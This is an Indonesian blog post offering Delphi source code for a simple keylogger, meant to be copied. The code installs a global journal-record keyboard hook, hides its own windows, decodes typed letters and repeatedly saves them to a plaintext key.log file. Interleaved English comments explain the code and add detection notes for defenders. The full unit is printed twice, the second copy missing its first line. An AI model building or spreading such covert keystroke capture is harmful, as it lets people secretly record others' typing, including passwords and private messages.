Berawal dari rasa ingin tahu bagaimana sebuah keylogger bekerja, saya coba-coba cari pakai om Google, ternyata nongol juga sebuah kode sederhana (tapi saya lupa lagi siapa yang punya tulisan tersebut, jadi nggak bisa ngasih tahu link-nya, sorry). Dengan sedikit perubahan dan penambahan, akhirnya program keylogger yang super acak-acakan ini bisa saya postingkan (maksaken pisan ie mah).
kodenya tinggal di copas>>>
unit keylog;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
// Declarations for the keylog unit: the main form, the pointer type used by
// the journal-hook callback, and the unit-level state shared between them.
type
// Main form of the program. Component properties (timer intervals, captions,
// event wiring) live in the .dfm resource, which is not part of this listing.
TForm1 = class(TForm)
Panel1: TPanel;
mlog: TMemo; // buffer that accumulates every decoded keystroke
Timer1: TTimer; // presumably wired to Timer1Timer in the .dfm (periodic save)
Timer2: TTimer; // presumably wired to Timer2Timer in the .dfm (window hiding)
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
// Pointer to the Windows EVENTMSG record; the hook callback casts its lParam to this.
type t_evt = ^EVENTMSG;
var
Form1: TForm1;
hookhandle : HHOOK; // handle returned by SetWindowsHookEx in FormCreate
bla : string; // last decoded character; assigned in the callback, never read in this unit
implementation
{$R *.dfm}
// Hook callback registered for WH_JOURNALRECORD in FormCreate.
// It reads the EVENTMSG that lParam points to, and for key-down messages maps
// the paramL value to a character that is appended to the form's memo.
//
// What an analyst should know when reading this:
// - Only lowercase a-z, space and Enter are decoded. Digits, punctuation and
//   shift state are not handled, so the captured text is lossy.
// - The Code argument is never inspected and Result is never assigned, so the
//   value returned to Windows is undefined.
// - lParam is declared as longint and cast to a pointer, which is only valid
//   in a 32-bit build.
// - Microsoft documents the journaling hook APIs as unsupported starting with
//   Windows 11; on Vista and later they are reportedly also restricted by UIPI.
//   NOTE(review): confirm against the target OS before relying on this.
function JournalCallBackProc(Code: Integer; wParam, lParam: longint): LRESULT;stdcall;
var y : string ; // decoded character; a managed string local, so it starts empty
var x : cardinal ; // raw paramL value of the current event
var ev : t_evt;
begin
ev := ptr(lParam); // treat lParam as a pointer to the EVENTMSG record
x := ev.paramL ;
// 256 = $0100 = WM_KEYDOWN; every other message leaves y empty.
if ev.message = 256 then begin
// The constants look like (scan code shl 8) or virtual-key code,
// e.g. 7745 = $1E41: low byte $41 is VK 'A', high byte $1E is its scan code.
case x of
// 283 = $011B, low byte $1B is VK_ESCAPE: pressing Esc removes the hook.
283 : UnhookWindowsHookEx(hookhandle);
7745 : y := 'a' ;
12354 : y :='b';
11843 : y :='c' ;
8260 : Y := 'd' ;
4677 : y := 'e' ;
8518 : y := 'f' ;
8775 : Y := 'g' ;
9032 : y := 'h' ;
5961 : y := 'i' ;
9290 : y := 'j' ;
9547 : y := 'k' ;
9804 : y := 'l' ;
12877 : y :='m' ;
12622 : y :='n' ;
6223 : y := 'o' ;
6480 : y := 'p' ;
4177 : y := 'q' ;
4946 : y := 'r' ;
8019 : y := 's' ;
5204 : y := 't' ;
5717 : y := 'u' ;
12118 : y :='v' ;
4439 : y := 'w' ;
11608 : y :='x' ;
11353 : y :='y' ;
5466 : y := 'z' ;
14627 : y := ''; // explicitly mapped to nothing
14624 : y := ' ' ; // 14624 = $3920, low byte $20 is VK_SPACE
// 7181 = $1C0D, low byte $0D is VK_RETURN: adds a new memo line holding one space.
7181 : form1.mLog.Lines.Add(' ');
end;
end;
bla := y ; // keep the last decoded character in the unit-level variable
// Runs for every event, including non-key-down ones where y is empty.
form1.mLog.Text := form1.mLog.Text + y ;
end;
// Form start-up handler: hides the form, installs the journal-record hook and
// writes the outcome into the memo.
//
// Defender note: a process that calls SetWindowsHookEx with WH_JOURNALRECORD
// while hiding its own window is a useful behavioural indicator for API
// monitoring and EDR rules.
procedure TForm1.FormCreate(Sender: TObject);
begin
form1.Hide; // the UI is hidden before anything else happens
// Registers JournalCallBackProc for WH_JOURNALRECORD, passing this module's
// instance handle and thread id 0.
hookhandle := SetWindowsHookEx(WH_JOURNALRECORD, @JournalCallBackProc , Hinstance, 0);
// A zero handle means the hook was not installed; the status line ends up in
// the memo and therefore also in the saved log file.
if hookhandle = 0 then begin
mLog.Lines.Add('Hook Failed');
end
else begin
mLog.Lines.Add('Hooked');
end;
end;
// Timer handler that writes the whole memo buffer to 'key.log'.
// The path is relative, so the file lands in the process's current directory,
// and the content is plaintext. The firing interval is set in the .dfm and is
// not visible here.
//
// Defender note: a repeatedly rewritten plaintext file named key.log next to
// an unknown executable is a simple file-system artefact to hunt for.
procedure TForm1.Timer1Timer(Sender: TObject);
begin
mlog.Lines.SaveToFile('key.log');
end;
// Timer handler that looks up top-level windows titled 'form1' and 'myspay'
// and hides them with SW_HIDE. 'myspay' is presumably the application's own
// title; the listing does not show where it is set.
// The FindWindow result is not checked, so ShowWindow is called with a zero
// handle when no such window exists.
//
// Defender note: only the windows are hidden. The process itself is untouched
// by this code and remains visible in process listings.
procedure TForm1.Timer2Timer(Sender: TObject);
begin
showwindow(findwindow(nil,'form1'),sw_hide);
showwindow(findwindow(nil,'myspay'),sw_hide);
end;
end.
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
// Declarations for the keylog unit: the main form, the pointer type used by
// the journal-hook callback, and the unit-level state shared between them.
type
// Main form of the program. Component properties (timer intervals, captions,
// event wiring) live in the .dfm resource, which is not part of this listing.
TForm1 = class(TForm)
Panel1: TPanel;
mlog: TMemo; // buffer that accumulates every decoded keystroke
Timer1: TTimer; // presumably wired to Timer1Timer in the .dfm (periodic save)
Timer2: TTimer; // presumably wired to Timer2Timer in the .dfm (window hiding)
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
// Pointer to the Windows EVENTMSG record; the hook callback casts its lParam to this.
type t_evt = ^EVENTMSG;
var
Form1: TForm1;
hookhandle : HHOOK; // handle returned by SetWindowsHookEx in FormCreate
bla : string; // last decoded character; assigned in the callback, never read in this unit
implementation
{$R *.dfm}
// Hook callback registered for WH_JOURNALRECORD in FormCreate.
// It reads the EVENTMSG that lParam points to, and for key-down messages maps
// the paramL value to a character that is appended to the form's memo.
//
// What an analyst should know when reading this:
// - Only lowercase a-z, space and Enter are decoded. Digits, punctuation and
//   shift state are not handled, so the captured text is lossy.
// - The Code argument is never inspected and Result is never assigned, so the
//   value returned to Windows is undefined.
// - lParam is declared as longint and cast to a pointer, which is only valid
//   in a 32-bit build.
// - Microsoft documents the journaling hook APIs as unsupported starting with
//   Windows 11; on Vista and later they are reportedly also restricted by UIPI.
//   NOTE(review): confirm against the target OS before relying on this.
function JournalCallBackProc(Code: Integer; wParam, lParam: longint): LRESULT;stdcall;
var y : string ; // decoded character; a managed string local, so it starts empty
var x : cardinal ; // raw paramL value of the current event
var ev : t_evt;
begin
ev := ptr(lParam); // treat lParam as a pointer to the EVENTMSG record
x := ev.paramL ;
// 256 = $0100 = WM_KEYDOWN; every other message leaves y empty.
if ev.message = 256 then begin
// The constants look like (scan code shl 8) or virtual-key code,
// e.g. 7745 = $1E41: low byte $41 is VK 'A', high byte $1E is its scan code.
case x of
// 283 = $011B, low byte $1B is VK_ESCAPE: pressing Esc removes the hook.
283 : UnhookWindowsHookEx(hookhandle);
7745 : y := 'a' ;
12354 : y :='b';
11843 : y :='c' ;
8260 : Y := 'd' ;
4677 : y := 'e' ;
8518 : y := 'f' ;
8775 : Y := 'g' ;
9032 : y := 'h' ;
5961 : y := 'i' ;
9290 : y := 'j' ;
9547 : y := 'k' ;
9804 : y := 'l' ;
12877 : y :='m' ;
12622 : y :='n' ;
6223 : y := 'o' ;
6480 : y := 'p' ;
4177 : y := 'q' ;
4946 : y := 'r' ;
8019 : y := 's' ;
5204 : y := 't' ;
5717 : y := 'u' ;
12118 : y :='v' ;
4439 : y := 'w' ;
11608 : y :='x' ;
11353 : y :='y' ;
5466 : y := 'z' ;
14627 : y := ''; // explicitly mapped to nothing
14624 : y := ' ' ; // 14624 = $3920, low byte $20 is VK_SPACE
// 7181 = $1C0D, low byte $0D is VK_RETURN: adds a new memo line holding one space.
7181 : form1.mLog.Lines.Add(' ');
end;
end;
bla := y ; // keep the last decoded character in the unit-level variable
// Runs for every event, including non-key-down ones where y is empty.
form1.mLog.Text := form1.mLog.Text + y ;
end;
// Form start-up handler: hides the form, installs the journal-record hook and
// writes the outcome into the memo.
//
// Defender note: a process that calls SetWindowsHookEx with WH_JOURNALRECORD
// while hiding its own window is a useful behavioural indicator for API
// monitoring and EDR rules.
procedure TForm1.FormCreate(Sender: TObject);
begin
form1.Hide; // the UI is hidden before anything else happens
// Registers JournalCallBackProc for WH_JOURNALRECORD, passing this module's
// instance handle and thread id 0.
hookhandle := SetWindowsHookEx(WH_JOURNALRECORD, @JournalCallBackProc , Hinstance, 0);
// A zero handle means the hook was not installed; the status line ends up in
// the memo and therefore also in the saved log file.
if hookhandle = 0 then begin
mLog.Lines.Add('Hook Failed');
end
else begin
mLog.Lines.Add('Hooked');
end;
end;
// Timer handler that writes the whole memo buffer to 'key.log'.
// The path is relative, so the file lands in the process's current directory,
// and the content is plaintext. The firing interval is set in the .dfm and is
// not visible here.
//
// Defender note: a repeatedly rewritten plaintext file named key.log next to
// an unknown executable is a simple file-system artefact to hunt for.
procedure TForm1.Timer1Timer(Sender: TObject);
begin
mlog.Lines.SaveToFile('key.log');
end;
// Timer handler that looks up top-level windows titled 'form1' and 'myspay'
// and hides them with SW_HIDE. 'myspay' is presumably the application's own
// title; the listing does not show where it is set.
// The FindWindow result is not checked, so ShowWindow is called with a zero
// handle when no such window exists.
//
// Defender note: only the windows are hidden. The process itself is untouched
// by this code and remains visible in process listings.
procedure TForm1.Timer2Timer(Sender: TObject);
begin
showwindow(findwindow(nil,'form1'),sw_hide);
showwindow(findwindow(nil,'myspay'),sw_hide);
end;
end.
Berbeda dengan posting contoh program sebelumnya, saya tidak akan menerangkan program ini di sini, tapi nanti saya bahas fungsi dan prosedurnya di posting berikutnya.
Kalau mau ngepost kode di atas, saya harap ditambah dan dikurangi terlebih dahulu supaya kode di atas menjadi lebih baik (nggak acak-acakan).